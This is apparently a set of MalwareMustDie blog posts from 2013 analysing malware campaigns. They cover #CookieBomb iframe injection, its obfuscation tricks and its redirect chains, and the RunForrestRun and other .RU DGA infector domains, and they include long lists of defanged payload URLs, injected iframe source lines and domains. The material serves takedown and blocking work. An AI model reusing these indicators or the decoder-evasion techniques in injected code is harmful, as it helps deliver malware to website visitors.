0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141
Of course we issued the request for immediate shutdown for these payload domains, which is 97 in total (so far.. maybe more.. please inform us if you find more). But it looks like until this moment this post is written only four domains got shutdown and 93 of them are still up and alive as per below list of DGA .RU domains and IP used: 
uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
hozfezbe.ru,178.210.222.205,
Since the weekend is coming and I bet the infecion is still in the wild, we urge everyone to block these .RU listed, for a precaution if we can not shut these mess down in time.

Your cooperation is highly appreciated, with thank you in advance!

#MalwareMustDie!

Some encoding note(s) on modified #CookieBomb attack's obfuscated injection code

July 20, 2013, 9:01 am
$
0
0
We posted the attack related to this injection code in many web pages as per posted here: -->>[previous post], I called this as #CookieBomb attack, it uses the obfuscation JavaScript to burp the hidden redirection via IFRAME and the cookie condition to be used as a ticket for malware infection further maliciousre direction. This post is an additional note of a recent updates of injection code used, as a notice for the adjustment that needed to make for the automation tools on detection related infected sites (if necessary).

Recently I saw a slight modifications for the injected script for infection they use, which I tried to documented in here as per following points.

1. Method of PHP script wrapping

With a simple trick which using PHP script's "echo" command to obfuscate the JavaScript codes wrapped within.

I saw a new infected site with this code like this one, just now, well is is a good gardening shop site, a victim website:

If you see in the infected/hacked site it shows the code" " in the upper left corner of the page, thus in the HTML code you can see the malicious code injected to it. The injected code is having the same pattern of usage of a long long white spaces as a silly attempt o hide it.

The problem is, if you scan as per it is through "known" tools the scanning can not be performed as per it is, i.e.: you'll get the result like this-->>[LINK-1] or this-->>[LINK-2]
which is not showing any malicious detection (except the long white space trails maybe..) Yes this code "currently" can not be scanned in the JavaScript auto decoding tools, and that's what the bad guys wanted it.

So let's take a look closer at the code:

The bad actors is using the JavaScript wrapped in the php command, in this case the echo command, which for the symbol it needs to use the escape character of backslash "\" for the quote sign. This is why the automation can not decode this well, because actually it is in a form of PHP script.

So what are we suppose to overcome this? All we have to do is to remove those characters (I marked those character in the green color) above and you can decode it at will in any JavaScript decoding tools to get the result of the #CookieBomb code as per below:

This scheme will be changed for sure, but don't worry nor afraid of it, because no matter what these bad actors made we shall crack it well. I am sorry for the "light" technicalities I wrote this time, but the impact of this matter is huge and infection is wide, I assume the awareness is necessary. With noted, not only #CookieBomb case, the similar trick can be performed to avoid automation and detection to other malicious obfuscation too.

Samples

I share my decoding note in case you don't want to make risk accessing the infected site I mentioned above in here-->>[SAMPLE].
The password is as usual.

2. Method of mixing hex number

I found the infected sites as per below snapshot:

In the above picture it looks like the usual #CookieBomb obfuscated code, which is not.
My fellow co-workers complaining me that they can not decode this using the automation, which I checked into the Wepawet amd Jsunpack to confirm it as per shown in below:

If you see the code closer you will see the code contains the new trick of obfuscation using the character stated in its hex values as per snipped below:

As you see there are hex of "0x62" and "0xa-02" used in the obfuscation code.

In the first part, you change the hex into its ASCII character and in the second part if you calculate the hex calculation, you can substitute the result directly to the code into:

And you can decode these without problem by your favourite decoder tools, which mine is the "ape" one :-)
The decoded result:

3. Method of string splitting & mixing hex code operation with integer

There is an infected sites which injected by #CookieBomb code as per below:

The code is as per below code and can not be processed in automation tools, the question is why?

If we see it carefully in below marked parts there was a modification:

As per previously explained it used the mixed hex character to replace the real value, but it added string splitting of the hex characters as per seen in line 5. And also noted in the line 32, the condition combined with the hex and integer (0x19==031) and also the subtraction operation of hex with integer stored variable "bv".

Just change the value as per noted with the green color and you can decode into any tools you prefer. PS for spider monkey or rhino simulator this code will run without problem and storing the result instantly.

Below is the decoding result:

#MalwareMustDie!

What is behind #CookieBomb attack? (by @malm0u53)

July 23, 2013, 4:00 am
$
0
0
You know me as @malm0u53 crusade member of MalwareMustDie. I would write about what #CookieBomb code injection's attack can actually damage and infect our system with this investigation report.

I saw a wide spread infection of code injection reported in here, and decided to help the investigation:

As you may see in my tweets, I was struggling with the recent infection reported. And I came into conclusion of what to grep to follow and mitigate this attack further: Which ending up to the list of the functions and its IFRAME redirection below: 
" function zzzfff() { mdi.src = 'hxxp://kirtec.de/asvz/Mgf4RNhq.php';
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { e.src =   'hxxp://onewaypr.my-ehost.com/products/YFb48ymx.php';
" function zzzfff() { y.src =   'hxxp://yogyavilla.com/Map_Chinese_files/dtd.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function zzzfff() { kaizc.src ='hxxp://press2.blogolize.com/cnt.php';
" function zzzfff() { yk.src = 'hxxp://gidropark.net/traf.php';
" function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" function zzzfff() { e.src = 'hxxp://www.viagemanimais.com.br/2R83bpTL.php';
" function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
" function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';"
" function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
" function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
" function zzzfff() { ax.src = 'hxxp://portofmiamicruiseparking.com/log/dtd.php';
" function zzzfff() { orih.src = 'hxxp://smartsecurit.cz/clik.php';
" function zzzfff() { i.src = 'hxxp://hauser-consulting.com/relay.php';
" function zzzfff() { pndb.src = 'hxxp://rocklandaerospace.com/edi/x46kpMKR.php';
" function zzzfff() { iwuu.src = 'hxxp://www.mai-ban.com/clik.php';
" function zzzfff() { p.src = 'hxxp://koliba.xercom.cz/yjW7x3V8.php';
" function zzzfff() { chyo.src = 'hxxp://dv-suedpfalz.de/melde/dtd.php';
" function zzzfff() { iin.src = 'hxxp://casino.kuti-komi.com/traf.php';
" function zzzfff() { di.src = 'hxxp://web134.sv01.net-housting.de/dtd.php';
" function zzzfff() { gir.src = 'hxxp://www.teutorace2012.de/components/mjBr9dbV.php';
" function zzzfff() { obgn.src = 'hxxp://www.talkingtojesus.com/Backups/QLMyqwF9.php';
" function zzzfff() { qvhb.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { s.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { ucr.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { vpbo.src = 'hxxp://inntech.org.ru/counter.php'
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
[...]

Wow. Many links to follow.. So I made breakdown check for each PHP infectors as per released in pastebin: http://pastebin.com/raw.php?i=0cGUGk8X

The significant results I summarized below:

One of the link of: 

" function zzzfff() {
ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect  >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm
Which goes straight to the exploit page landing page I mentioned here

The other link goes straight to the fake 502: 

function zzzfff() {
rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
"  >> 500 Internal Server Error
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 
        mod_auth_passthrough/2.1 mod_bwlimited/1.4 
FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1
Verdict of the malicious URL above is here

One of the link redirecting to the localhost, strange for a good link is it? 

" function zzzfff() {
     gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
  HTTP/1.1 302 Found

Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

One link lead to permanent redirection of Exploit Kit landing page, that IP is a Plesk panel user: 

" function zzzfff() {
     gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
"  HTTP/1.1 301 Moved Permanently

Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
↑Verdict: [1] and [2]

One link of: 

" function zzzfff() {
 c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';" >
Redirects users to:  hxxp://www.schwarzeraben.de/rel.php
Loads malware from: 
fgnfdfthrv.bee.pl
alolipololi.osa.pl 
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
↑This attack uses the .htaccess file to redirect users to a sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
The MMD tools for domains check shows result of: 
fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,
which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection,
the fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl is currently blacklisted and other .RU domains is inactive.

The below links went straight to the blacklisted sites: 

" function zzzfff() {
csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
↑Verdict: [1][2]

And.. 

" function zzzfff() {
     nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
"
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Verdict: [1][2]

With many other similar results in the pastebin I reported here

This investigation is posted to help to verdict the malicious activities caused by #CiookieBomb code injection attack and the shutdown purpose for its detected malicious domains. The post is a work of the group effort, thank you to: @DarrelRendell and @Secluded_Memory for the help supporting this case with great advice.

#MalwareMustDie!

The come back of the .RU RunForrestRun's DGA with 365 domains infector (ALIVE!)

July 23, 2013, 5:42 am
$
0
0
I came into infection site spotted in Japan network as per snapshot below:

Which is a site to guide and introduce works for the lady workers, and that site is having infection of the obfuscation code of the RunForrestRun a DGA .RU domain-base malware infection. We are having experiences with this DGA from the day one we started malwaremustdie, so if you search for RunforrestRun keyword in our blog you'll see many result like this -->>[Google Search Result].

By successfully shutdown and stopping those infection cases in the past, using the knowledge we gathered, as a reference to share we released a public guide line for handling DGA cases as per posted in our Google Code here-->>[GoogleCode]

After a while we didn't see the activity of these infector, until yesterday accidentally saw the same infector once more. We posted this findings and how to decode this in our twitter announcement here:

The obfuscation code

There are some changes in the infector we spotted now, practicaly the randomization logic is slightly improved, and double obfuscation used is using a "blackhole" style of encoding javascript. The obfuscation itself was encoded by two layer encoding stages, we saw soe similar encoding style of these in the infected sites which lead to Blackhole or Cool Exploit Kit, suggested a co-relation between those cases (i.e.: they purchased the encoding service). The decoding steps can be viewed in our pastebin here-->>[PASTEBIN]

If we see the front encoded method, the one we saw injected in hacked site, it has the below structure:

If you see the typical tag used for encoded part (red color), it was wrapped within the script tag (purple color) and the JavaScript's String.fromCharCode method was used for decoding the long obfuscation data between those tags.

Just run the above code in any JS simulator we'll get the real obfuscation code. The hexed code we paste in pastebin link (mentioned above) too. By feeding the obfuscation long data into the logic below: 

document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ?
..it stores those data into document object to be decoded in the below generator:

Which (the red color) shows the deobfuscation logic and the purple color shows the "eval" method used to extract the decoded value.

Finally we came into the final deobfuscated result which is the core of the "RunForrestRun" infector domain randomization logic itself. In this version, the randomization code I separated into three parts, the seeds, calculation part, and formulation logic, as per below breakdown:

And the result will be written as IFRAME in of the .RU urls of: 

"h00p://" + domainName + ".RU/runforestrun?sid=botnet2"
As per below code states:

The infector domain and current status

Our friend, Mr. Darrel Rendell helped to extract the .RU infector domains based on time input to the random logic as per he tweeted below:

The result is very good seperated by the function of dates within a year of cycle of the extracted 365 domains, which can be viewed here-->>[PASTEBIN]< With thank you for the help on this.

I just checked the current ALIVE of the extracted domains using our beloved tool which we share it here-->>[GoogleCode] and found the current domains ARE UP & ALIVE as per below list: 

bumggasfaoywfncc.ru,195.22.26.231,
vvteeuevhpbpepfi.ru,91.233.244.102,
ijxsncuprepwqzlt.ru,91.233.244.102,
knuidyekzkyuhtpi.ru,91.233.244.102,
You can see the check PoC that I performed in our paste here-->>[MMD Pastebin]
The other way to check whether these domains alive or not is via root DNS it self, I pick the first domain and search/trace it records in DNS now and found it alive: 
Tracing to bumggasfaoywfncc.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) Got authoritative answer
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |      \___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
  \___ f.dns.ripn.net [ru] (193.232.156.17)
       |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
        \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
The below is the current URLQuery report of the four alive .RU infector URLs/domains above to check the HTTP response, the thank's to URLQuery for its "on-the-record" feature:
http://urlquery.net/report.php?id=3952242
http://urlquery.net/report.php?id=3952365
http://urlquery.net/report.php?id=3952414
http://urlquery.net/report.php?id=3952290
The 3 domains above replied with the IP of 91.233.244.102 is currently an active domains which can be proved by the whois data below: 
domain:        VVTEEUEVHPBPEPFI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        IJXSNCUPREPWQZLT.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        KNUIDYEKZKYUHTPI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.11.06
paid-till:     2013.11.06
free-date:     2013.12.07
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK
As per seen in the above data, the REGGI.RU registrar was tricked/abused somehow to let these domains entering internet. Later on we know that one domain left was sinkholed in 195.22.26.231.
We also learned that the abuse type of registration in Russia registrar always show the status of REGISTERED, DELEGATED, UNVERIFIED just as per stated in the above active domains. This information is very important to follow the shutdown process further.

The conclusion

This DGA is ALIVE and harmful. Please block these domains for it is proven ALIVE.
The usage of these DGA will not be good, so no further verdict needed from our side.
Our friend Conrad Longmore, from Dynamoo Blog also suggest all of us to block IP: 91.233.244.102 as per recorded many malicious activities found in this IP, as per following his tweet:

For the conveniences of the dismantling purpose we pasted also the list of domains we decoded from this DGA below, sorry for taking so much space for this report: 
kxfcnwlyyohascji.ru
wjikjkybqouienfm.ru
jwkynwfxjqdqqmji.ru
vjnhblgryauqcpmr.ru
iwoughjskqxnoury.ru
tirdttcivfplnrds.ru
gwtrhozqbvudulyl.ru
siwafwlsbplqrxly.ru
fvxordgblagqooqx.ru
rhbyvkanoqokqyit.ru
evdmudjenjokhgmz.ru
phgunkwwcglepbdc.ru
cuijmuljysivscwe.ru
oglrzlxpvxfhgihb.ru
bumggasfaoywfncc.ru
ngpormkfmmcfgysb.ru
yrqwbnjqbnfhpbuu.ru
lguktmilemdssbyx.ru
xrvstpmjbtxnttxd.ru
kfzhvfgdfixkfdrr.ru
wqbrmmqhlkusiixa.ru
jfegifyhkbjxfflc.ru
uqfnewvxvyvsrxuk.ru
hejcagnpfrpnqefc.ru
tqkkpnnamkpqnyym.ru
genyzeyokjwxykzm.ru
spphczekzysdypqb.ru
fdsvrfljfaskbylv.ru
qptetotipsmswbqw.ru
ddxrlumbiwovldwg.ru
poyalyqorovwqves.ru
ntppvruxnkdjhvbh.ru
zgsxmhffvnizvxft.ru
mtuloilstrcfoykq.ru
yfxueilamhutmmnr.ru
ksyiaulnbpgnxpjs.ru
wfcsvebxgiynxlbc.ru
jsehchxfgboukksb.ru
vehpowijritygngg.ru
isjdecxytkoiazad.ru
uemmazcuvorvsadb.ru
grnzukxvhqnjfana.ru
sdqirxitzjgxxxhf.ru
frswwkcwyjwmrorb.ru
rdvfkzvdqxpufsep.ru
eqxsyluecdcxpped.ru
qdbewgrvhvwygvlo.ru
cqcrrdgweomwshmp.ru
ocfaopqtguzswofi.ru
bpholidutrkjmtpp.ru
nckwyplkpfqczmxl.ru
znlfqprdgejpllxi.ru
mbosgirfmfoygmhk.ru
xnqbiapjqcpvvcqz.ru
kbtpctegrcuillhc.ru
wmuxxiagzhcieofr.ru
jaymuwnpcjtqcwot.ru
vmzukuabemehxwpw.ru
hzbkqtgarqrmdlcx.ru
qqafbwfwjrflbmdo.ru
deeskswjfulkurjc.ru
ppfbslcowvdivwmr.ru
cejpdwxlftekbrch.ru
npkxjvsffuotzmij.ru
adnmvxwbyzjwvasg.ru
moouumrwtvnetzfu.ru
ybrdscaecknwugpu.ru
lotqnwonxpgigjox.ru
xawyilvvdurtcltc.ru
joynyhkerylsfygl.ru
vzzvoqbscqsnmrqr.ru
indlredwgvungvsq.ru
uyethhnsehcfqilz.ru
hniitysuwprckvzs.ru
syjqyvrpyohlexgj.ru
fmmflppopijsipdr.ru
ryonlorhvoekruec.ru
emrbflbunrcqrjgk.ru
qxsjdyodxeyyechp.ru
dlwxvurpfeyqyqcj.ru
oxxguneutbrhtsjx.ru
blbwpvcyztrepfue.ru
nwcenehdgqyxtssq.ru
zjfndnhwdsrwephi.ru
mwhbjgismatmjuji.ru
yikkpeqinkedjnxs.ru
kvmxjgblbhjgpjvw.ru
wipgnmjxfgwttrlf.ru
jvqtbrrbikxribjl.ru
vhtdynyciknmkblg.ru
tmlrjxvvrvkyxofn.ru
gbogvuamqydsxcgz.ru
smpovxvnxkelrgzt.ru
eatdfntzfgqrprmj.ru
qlulnseexvzpptcm.ru
dzvyrlqebdcolbei.ru
plzhfkuhkocvqwvx.ru
cybxcikisigkmqtl.ru
olegrpgtdxosnnkc.ru
aygtmclwegxsmjid.ru
mkjdkbwuxcnuxtqd.ru
yvklttrmfvygrvwk.ru
lknyzylpjzkasnmo.ru
xvphlknpxewklsyd.ru
kjsvlbwoxhcbtfpq.ru
vvteeuevhpbpepfi.ru
ijxsncuprepwqzlt.ru
uuyavjatmoykgodf.ru
hicqgipogsjulrgn.ru
tudygcklurkthcmt.ru
gihnijebfitftukm.ru
rtivxqoindugifaf.ru
ehmjatkmhnivwxdo.ru
qtnrpbmfuierqstw.ru
dhqgdpbdxrusdxcw.ru
psroiljvwkqrnfqf.ru
bhvdnklorkjcfppd.ru
nswltcjxwwnbrljp.ru
agabgtdhgsbspwsq.ru
mrcjwchanjuilitl.ru
yefscrehgfveysyc.ru
wjvftsujnszcvevs.ru
jwwtixcvymcflhob.ru
vibeglyuxuzbkgbo.ru
hwcrlxhvrevsnzwl.ru
tifbsmujkhbvbkyj.ru
gvhodonxvblrghch.ru
shkwimusoizncvhx.ru
fvllwtyeleporhen.ru
rhotamrrectjqfto.ru
duqhgptpqmsyyrqj.ru
phtqmnbhcmyknyss.ru
cuveztrnrgnshbgp.ru
ogymeohrjxfscgfs.ru
btacsqzlgctcxjei.ru
mgdlwkvcgkygcqck.ru
yretgeoqsvdnikar.ru
lfihodgqdjmfqppt.ru
xrjpymuxzutqaudg.ru
kfnebggkwsjlxzbk.ru
wqomqwbvtwiwejid.ru
ierbdycqkclubnex.ru
uqsiihfbyeotruuc.ru
hewwcxblormskqae.ru
tpxfuxwvnqcmekoi.ru
gdbvudwhpnuwrdls.ru
spdenojggmdrlixc.ru
edgsojssutkqjbxg.ru
qohaffgzdpnksohx.ru
ddloyfnurjprfwnb.ru
pomwopzpscwqxpfv.ru
zfguwvhdmjlutvwo.ru
mtiidqbknpskzasp.ru
xflrjyyjswoatsoq.ru
ksmfflbpefxgfdsv.ru
wepnhoeeodiklyar.ru
jsrcwahdmdarwmto.ru
veukmrlhkghlqqjn.ru
irwxwuybkwltqnhx.ru
tezhfswbxfnnuhbd.ru
grbwyglkgkieiybk.ru
sdefwonjqnujdoxr.ru
fqgtjwvcrkmuhkco.ru
rdjcjrxljzaughvt.ru
eqkplxtjjuhkbeqs.ru
pcoyyxsfhsyysfme.ru
cppmejjneikodxrc.ru
ocsuqiqvvknfvcjp.ru
bpujwsmplvftnqcx.ru
nbxrjalwllvnbmfs.ru
znyzszkdrxgnovuq.ru
lbcpvpxigyferhws.ru
xmexlajhysktwdqe.ru
kahmnunornwrgpgb.ru
wmiudbgrcvapriql.ru
jzkitejvrxgkgpgi.ru
ulnrpbudycxzdlkt.ru
hyoflopkupjioiqq.ru
tlrnhskrgijhwtlj.ru
gytcnulxsxpsqkfn.ru
skwkybckmywhrhbb.ru
dernflilrdxmfnye.ru
ppsvcvrcgkllplyn.ru
bdvkpbuldslsapeb.ru
npxsiiwpxqqiihmo.ru
adbjjkquyyhyqknf.ru
mocrafrewsdjztbj.ru
yafzvancybuwmnno.ru
lohnrnnpvvtxedfl.ru
wakvnkyzkyietkdr.ru
jnlkttkruqsdjqlx.ru
vznrahwzgntmfcqk.ru
inqgvoeohpcsfxmn.ru
uyrorwlibbjeasoq.ru
gmvdnpqbblixlgxj.ru
sywleisrsstsqoic.ru
fmacqvmqafqwmebl.ru
rxbkqfydlnzopqrn.ru
elfxqghdubihhsgd.ru
qxggipnnfmnihkic.ru
clkujrjqvexvbmoi.ru
owldagkyzrkhqnjo.ru
blorcdyiipxcwyxv.ru
nwpykqeizraqthry.ru
zisiiogqigzzqqeq.ru
mvuvchtcxxibeubd.ru
xixftoplsduqqorx.ru
kvzstpqmeoxtcwko.ru
whddmvrxufbkkoew.ru
jveqgnmjxkocqifr.ru
vhhzcvbegxbjsxke.ru
iujniiokeyjbmerc.ru
gacdiuwnhonuulpe.ru
rmdlgyreitjsjkfq.ru
ezfydrexncoidbus.ru
qlihxnncwioxkdls.ru
